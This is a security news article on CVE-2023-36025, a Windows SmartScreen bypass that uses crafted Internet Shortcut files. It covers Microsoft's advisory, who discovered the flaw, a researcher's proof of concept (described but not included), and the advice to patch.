Researchers have reverse-engineered a patch issued by Microsoft to create a proof-of-concept (PoC) exploit for the CVE-2023-36025 vulnerability. This vulnerability was actively exploited before it was discovered and patched. The flaw, rated 8.8 in severity, is a complex security feature bypass vulnerability found within the Windows SmartScreen component.
According to an advisory by Microsoft, this flaw allows attackers to bypass the standard SmartScreen checks and their corresponding warnings. For a user to become a victim, they must click on a specially crafted Internet Shortcut (.URL) or a hyperlink that leads to such a file. Microsoft's advisory, issued as part of this month's Patch Tuesday updates, states, “The attacker would be able to bypass Windows Defender SmartScreen checks and their associated prompts,” and “The user would have to click on a specially crafted Internet Shortcut (.URL) or a hyperlink pointing to an Internet Shortcut file to be compromised by the attacker.”
The detection and reporting of this vulnerability are credited to Will Metcalf of Splunk, the Microsoft Threat Intelligence, and the Microsoft Office Product Group Security Team. The exploit involves an Internet Shortcut file that appears harmless but secretly redirects to a malicious website. The IconFile path, potentially a network location controlled by the attacker, can contain malicious payloads. The delivery method could be as common as phishing emails or compromised websites.
When users click on this crafted .URL file, they do not receive the usual SmartScreen warning. Instead, they are directed to a malicious site or trigger harmful code execution unknowingly. Security Lit Limited has developed a PoC exploit to demonstrate the practical application of the CVE-2023-36025 flaw. This PoC highlights the vulnerability: a crafted Internet Shortcut file or hyperlink that SmartScreen does not flag correctly, paving the way for potential exploits.
Microsoft has issued a patch to remedy this vulnerability, and users are strongly recommended to apply this patch immediately to safeguard their systems.